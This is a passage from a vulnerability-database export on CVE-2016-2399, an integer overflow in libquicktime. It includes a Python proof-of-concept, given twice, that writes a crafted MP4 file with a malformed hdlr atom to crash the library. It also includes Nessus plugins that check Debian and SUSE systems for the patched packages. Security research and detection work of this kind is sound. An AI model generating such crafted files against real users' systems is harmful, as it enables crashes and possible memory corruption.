Dos exploits for multiple platform", "published": "2016-02-23T00:00:00", "type": "exploitdb", "title": "libquicktime 1.2.4 - Integer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-2399"], "modified": "2016-02-23T00:00:00", "id": "EDB-ID:39487", "href": "https://www.exploit-db.com/exploits/39487/", "sourceData": "#!/usr/bin/env python\r\n#\r\n###\r\n# - 7 February 2016 -\r\n# My last bug hunting session (*for fun and no-profit*) \r\n# has been dedicated to libquicktime\r\n###\r\n# \r\n# Author: Marco Romano - @nemux_ http://www.nemux.org\r\n# libquicktime 1.2.4 Integer Overflow\r\n#\r\n# Product Page: http://libquicktime.sourceforge.net/\r\n# Description: 'hdlr', 'stsd', 'ftab' MP4 Atoms Integer Overflow\r\n# Affected products: All products using libquicktime version <= 1.2.4\r\n#\r\n# CVE-ID: CVE-2016-2399 \r\n#\r\n# Disclosure part: http://www.nemux.org\r\n#\r\n########\r\n####### Timeline\r\n#\r\n# 07 Feb 2016 Bug discovered\r\n# 17 Feb 2016 Mitre.org contacted\r\n# 17 Feb 2016 Disclosed to the project's maintainer\r\n# 23 Feb 2016 No response from the maintainer\r\n# 23 Feb 2016 Publicly disclosed \r\n#\r\n########\r\n####### References\r\n#\r\n# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2399\r\n# http://libquicktime.sourceforge.net/\r\n# http://www.linuxfromscratch.org/blfs/view/svn/multimedia/libquicktime.html \r\n# https://en.wikipedia.org/wiki/QuickTime\\_File\\_Format\r\n#\r\n#######\r\n#\r\n# DISCLAIMER: It's just a PoC... 
it will crash something\r\n#\r\n#### \r\nimport sys\r\nimport struct\r\nimport binascii\r\n\r\n\"\"\"\r\nThere needs to be an mp4 file with these nested atoms to trigger the bug:\r\nmoov -> trak -> mdia -> hdlr\r\n\"\"\"\r\nhax0r_mp4 = (\"0000001C667479704141414100000300336770346D70343133677036000000086D646174000001B1\" \r\n \"6D6F6F76\" #### moov atom\r\n \"0000006C6D76686400000000CC1E6D6ECC1E6D6E000003E80000030200010000010000000000000000000000\"\r\n \"000100000000000000000000000000000001000000000000000000000000000040000000000000000000000000000000\" \r\n \"00000000000000000000000000000003000000FD756474610000001263707274000000000000FEFF0000000000126175\"\r\n \"7468000000000000FEFF0000000000127469746C000000000000FEFF00000000001264736370000000000000FEFF0000\"\r\n \"0000001270657266000000000000FEFF000000000012676E7265000000000000FEFF00000000001A72746E6700000000\" \r\n \"00000000000000000000FEFF000000000018636C7366000000000000000000000000FEFF00000000000F6B7977640000\" \r\n \"000055C400000000276C6F6369000000000000FEFF000000000000000000000000000000FEFF0000FEFF0000000000FF\" \r\n \"616C626D000000000000FEFF0000010000000E79727263000000000000000002E4\"\r\n \"7472616B\" #### trak atom\r\n \"0000005C746B686400000001CC1E6D6ECC1E6D6E00000001000000000000030000000000000000000000000001000000\"\r\n \"000100000000000000000000000000000001000000000000000000000000000040000000000000000000000000000040\"\r\n \"6D646961\" #### mdia atom\r\n \"000000206D64686400000000CC1E6D6ECC1E6D6E00003E800000300000000000000000\"\r\n \"4E\" #### hdlr atom length\r\n \"68646C72\" #### hdlr atom\r\n \"0000000000\"\r\n \"4141414141414141\" #### our airstrip :)\r\n \"0000000000000000000000\" \r\n \"EC\" #### 236 > 127 <-- overflow here and a change in signedness too\r\n \"616161000000FF736F756E000000000000000000000000536F756E6448616E646C6572000000012B6D696E6600000010\")\r\n\r\nhax0r_mp4 = bytearray(binascii.unhexlify(hax0r_mp4))\r\n\r\ndef createPoC():\r\n try:\r\n with open(\"./nemux.mp4\",\"wb\") as 
output:\r\n output.write(hax0r_mp4)\r\n print \"[*] The PoC is done!\"\r\n except Exception,e: \r\n print str(e)\r\n print \"[*] mmmm!\"\r\n\r\ndef usage():\r\n print \"\\nUsage? Run it -> \" + sys.argv[0]\r\n print \"this poc creates an mp4 file named nemux.mp4\"\r\n print \"--------------------------------------------\"\r\n print \"This dummy help? \" + sys.argv[0] + \" help\\n\" \r\n sys.exit()\r\n\r\nif __name__ == \"__main__\":\r\n try:\r\n if len(sys.argv) == 2:\r\n usage()\r\n else:\r\n print \"\\nlibquicktime <= 1.2.4 Integer Overflow CVE-2016-2399\\n\"\r\n print \"Author: Marco Romano - @nemux_ - http://www.nemux.org\\n\\n\";\r\n createPoC();\r\n except Exception,e: \r\n print str(e)\r\n print \"Ok... Something went wrong...\"\r\n sys.exit()\r\n\r\n\r\n\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/39487/"}], "zdt": [{"lastseen": "2018-03-13T16:12:29", "description": "Exploit for multiple platform in category dos / poc", "edition": 1, "published": "2016-02-23T00:00:00", "type": "zdt", "title": "libquicktime 1.2.4 - Integer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-2399"], "modified": "2016-02-23T00:00:00", "href": "https://0day.today/exploit/description/25845", "id": "1337DAY-ID-25845", "sourceData": "#!/usr/bin/env python\r\n#\r\n###\r\n# - 7 February 2016 -\r\n# My last bug hunting session (*for fun and no-profit*) \r\n# has been dedicated to libquicktime\r\n###\r\n# \r\n# Author: Marco Romano - @nemux_ http://www.nemux.org\r\n# libquicktime 1.2.4 Integer Overflow\r\n#\r\n# Product Page: http://libquicktime.sourceforge.net/\r\n# Description: 'hdlr', 'stsd', 'ftab' MP4 Atoms Integer Overflow\r\n# Affected products: All products using libquicktime version <= 1.2.4\r\n#\r\n# CVE-ID: CVE-2016-2399 \r\n#\r\n# Disclosure part: http://www.nemux.org\r\n#\r\n########\r\n####### Timeline\r\n#\r\n# 07 Feb 2016 Bug discovered\r\n# 17 Feb 2016 Mitre.org contacted\r\n# 17 Feb 2016 Disclosed to 
the project's maintainer\r\n# 23 Feb 2016 No response from the maintainer\r\n# 23 Feb 2016 Publicly disclosed \r\n#\r\n########\r\n####### References\r\n#\r\n# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2399\r\n# http://libquicktime.sourceforge.net/\r\n# http://www.linuxfromscratch.org/blfs/view/svn/multimedia/libquicktime.html \r\n# https://en.wikipedia.org/wiki/QuickTime\\_File\\_Format\r\n#\r\n#######\r\n#\r\n# DISCLAIMER: It's just a PoC... it will crash something\r\n#\r\n#### \r\nimport sys\r\nimport struct\r\nimport binascii\r\n \r\n\"\"\"\r\nThere needs to be an mp4 file with these nested atoms to trigger the bug:\r\nmoov -> trak -> mdia -> hdlr\r\n\"\"\"\r\nhax0r_mp4 = (\"0000001C667479704141414100000300336770346D70343133677036000000086D646174000001B1\"\r\n \"6D6F6F76\" #### moov atom\r\n \"0000006C6D76686400000000CC1E6D6ECC1E6D6E000003E80000030200010000010000000000000000000000\"\r\n \"000100000000000000000000000000000001000000000000000000000000000040000000000000000000000000000000\"\r\n \"00000000000000000000000000000003000000FD756474610000001263707274000000000000FEFF0000000000126175\"\r\n \"7468000000000000FEFF0000000000127469746C000000000000FEFF00000000001264736370000000000000FEFF0000\"\r\n \"0000001270657266000000000000FEFF000000000012676E7265000000000000FEFF00000000001A72746E6700000000\"\r\n \"00000000000000000000FEFF000000000018636C7366000000000000000000000000FEFF00000000000F6B7977640000\"\r\n \"000055C400000000276C6F6369000000000000FEFF000000000000000000000000000000FEFF0000FEFF0000000000FF\"\r\n \"616C626D000000000000FEFF0000010000000E79727263000000000000000002E4\"\r\n \"7472616B\" #### trak atom\r\n \"0000005C746B686400000001CC1E6D6ECC1E6D6E00000001000000000000030000000000000000000000000001000000\"\r\n \"000100000000000000000000000000000001000000000000000000000000000040000000000000000000000000000040\"\r\n \"6D646961\" #### mdia atom\r\n \"000000206D64686400000000CC1E6D6ECC1E6D6E00003E800000300000000000000000\"\r\n \"4E\" #### hdlr atom 
length\r\n \"68646C72\" #### hdlr atom\r\n \"0000000000\"\r\n \"4141414141414141\" #### our airstrip :)\r\n \"0000000000000000000000\"\r\n \"EC\" #### 236 > 127 <-- overflow here and a change in signedness too\r\n \"616161000000FF736F756E000000000000000000000000536F756E6448616E646C6572000000012B6D696E6600000010\")\r\n \r\nhax0r_mp4 = bytearray(binascii.unhexlify(hax0r_mp4))\r\n \r\ndef createPoC():\r\n try:\r\n with open(\"./nemux.mp4\",\"wb\") as output:\r\n output.write(hax0r_mp4)\r\n print \"[*] The PoC is done!\"\r\n except Exception,e: \r\n print str(e)\r\n print \"[*] mmmm!\"\r\n \r\ndef usage():\r\n print \"\\nUsage? Run it -> \" + sys.argv[0]\r\n print \"this poc creates an mp4 file named nemux.mp4\"\r\n print \"--------------------------------------------\"\r\n print \"This dummy help? \" + sys.argv[0] + \" help\\n\"\r\n sys.exit()\r\n \r\nif __name__ == \"__main__\":\r\n try:\r\n if len(sys.argv) == 2:\r\n usage()\r\n else:\r\n print \"\\nlibquicktime <= 1.2.4 Integer Overflow CVE-2016-2399\\n\"\r\n print \"Author: Marco Romano - @nemux_ - http://www.nemux.org\\n\\n\";\r\n createPoC();\r\n except Exception,e: \r\n print str(e)\r\n print \"Ok... Something went wrong...\"\r\n sys.exit()\n\n# 0day.today [2018-03-13] #", "sourceHref": "https://0day.today/exploit/25845", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2021-01-12T09:44:19", "description": "Marco 'nemux' Romano discovered that an integer overflow in the\nquicktime_read_pascal function in libquicktime 1.2.4 and earlier\nallows remote attackers to cause a denial of service or possibly have\nother unspecified impact via a crafted hdlr MP4 atom.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n2:1.2.4-3+deb7u1.\n\nWe recommend that you upgrade your libquicktime packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. 
Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.", "edition": 17, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-03-01T00:00:00", "title": "Debian DLA-844-1 : libquicktime security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2399"], "modified": "2017-03-01T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:quicktime-x11utils", "p-cpe:/a:debian:debian_linux:libquicktime2", "p-cpe:/a:debian:debian_linux:quicktime-utils", "p-cpe:/a:debian:debian_linux:libquicktime-doc", "p-cpe:/a:debian:debian_linux:libquicktime-dev", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DLA-844.NASL", "href": "https://www.tenable.com/plugins/nessus/97441", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-844-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(97441);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-2399\");\n\n script_name(english:\"Debian DLA-844-1 : libquicktime security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Marco 'nemux' Romano discovered that an integer overflow in the\nquicktime_read_pascal function in libquicktime 1.2.4 and earlier\nallows remote attackers to cause a denial of service or possibly have\nother unspecified impact via a crafted hdlr MP4 atom.\n\nFor Debian 7 'Wheezy', these problems have been fixed in 
version\n2:1.2.4-3+deb7u1.\n\nWe recommend that you upgrade your libquicktime packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2017/03/msg00000.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/libquicktime\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libquicktime-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libquicktime-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libquicktime2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:quicktime-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:quicktime-x11utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/02/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/01\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"libquicktime-dev\", reference:\"2:1.2.4-3+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libquicktime-doc\", reference:\"2:1.2.4-3+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libquicktime2\", reference:\"2:1.2.4-3+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"quicktime-utils\", reference:\"2:1.2.4-3+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"quicktime-x11utils\", reference:\"2:1.2.4-3+deb7u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T14:26:05", "description": "This update for libquicktime fixes the following issues: Security\nissue fixed :\n\n - CVE-2016-2399: Adjust patch to prevent endless loop when\n there are less than 256 bytes to read. (bsc#1022805)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 27, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-07-31T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : libquicktime (SUSE-SU-2017:1986-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2399"], "modified": "2017-07-31T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:libquicktime-debugsource", "p-cpe:/a:novell:suse_linux:libquicktime0", "p-cpe:/a:novell:suse_linux:libquicktime0-debuginfo"], "id": "SUSE_SU-2017-1986-1.NASL", "href": "https://www.tenable.com/plugins/nessus/102066", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:1986-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(102066);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2016-2399\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : libquicktime (SUSE-SU-2017:1986-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for libquicktime fixes the following issues: Security\nissue fixed :\n\n - CVE-2016-2399: Adjust patch to prevent endless loop when\n there are less than 256 bytes to read. (bsc#1022805)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1022805\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2399/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20171986-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?36313e4f\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Software Development Kit 12-SP3:zypper in -t\npatch SUSE-SLE-SDK-12-SP3-2017-1229=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP2:zypper in -t\npatch SUSE-SLE-SDK-12-SP2-2017-1229=1\n\nSUSE Linux Enterprise Server for Raspberry Pi 12-SP2:zypper in -t\npatch SUSE-SLE-RPI-12-SP2-2017-1229=1\n\nSUSE Linux Enterprise Server 12-SP3:zypper in -t patch\nSUSE-SLE-SERVER-12-SP3-2017-1229=1\n\nSUSE Linux Enterprise Server 12-SP2:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2017-1229=1\n\nSUSE Linux Enterprise Desktop 12-SP3:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP3-2017-1229=1\n\nSUSE Linux Enterprise Desktop 12-SP2:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP2-2017-1229=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", 
value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libquicktime-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libquicktime0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libquicktime0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/31\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(2|3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2/3\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(2|3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP2/3\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libquicktime-debugsource-1.2.4-14.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libquicktime0-1.2.4-14.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libquicktime0-debuginfo-1.2.4-14.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libquicktime-debugsource-1.2.4-14.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libquicktime0-1.2.4-14.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libquicktime0-debuginfo-1.2.4-14.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libquicktime-debugsource-1.2.4-14.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libquicktime0-1.2.4-14.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libquicktime0-debuginfo-1.2.4-14.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libquicktime-debugsource-1.2.4-14.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libquicktime0-1.2.4-14.3.1\")) flag++;\nif 
(rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libquicktime0-debuginfo-1.2.4-14.3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libquicktime\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T14:25:32", "description": "This update for libquicktime fixes the following issues :\n\n - A crafted MP4 file could have caused libquicktime to\n crash or lead to undefined behaviour (bsc#1022805,\n CVE-2016-2399)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 28, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-03-07T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : libquicktime (SUSE-SU-2017:0610-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2399"], "modified": "2017-03-07T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:libquicktime-debugsource", "p-cpe:/a:novell:suse_linux:libquicktime0", "p-cpe:/a:novell:suse_linux:libquicktime0-debuginfo"], "id": "SUSE_SU-2017-0610-1.NASL", "href": "https://www.tenable.com/plugins/nessus/97572", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:0610-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(97572);\n script_version(\"3.7\");\n 
script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2016-2399\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : libquicktime (SUSE-SU-2017:0610-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for libquicktime fixes the following issues :\n\n - A crafted MP4 file could have caused libquicktime to\n crash or lead to undefined behaviour (bsc#1022805,\n CVE-2016-2399)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1022805\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2399/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20170610-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b155abf5\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Software Development Kit 12-SP2:zypper in -t\npatch SUSE-SLE-SDK-12-SP2-2017-326=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP1:zypper in -t\npatch SUSE-SLE-SDK-12-SP1-2017-326=1\n\nSUSE Linux Enterprise Server for Raspberry Pi 12-SP2:zypper in -t\npatch SUSE-SLE-RPI-12-SP2-2017-326=1\n\nSUSE Linux Enterprise Server 12-SP2:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2017-326=1\n\nSUSE Linux Enterprise Server 
12-SP1:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2017-326=1\n\nSUSE Linux Enterprise Desktop 12-SP2:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP2-2017-326=1\n\nSUSE Linux Enterprise Desktop 12-SP1:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP1-2017-326=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libquicktime-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libquicktime0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libquicktime0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. 
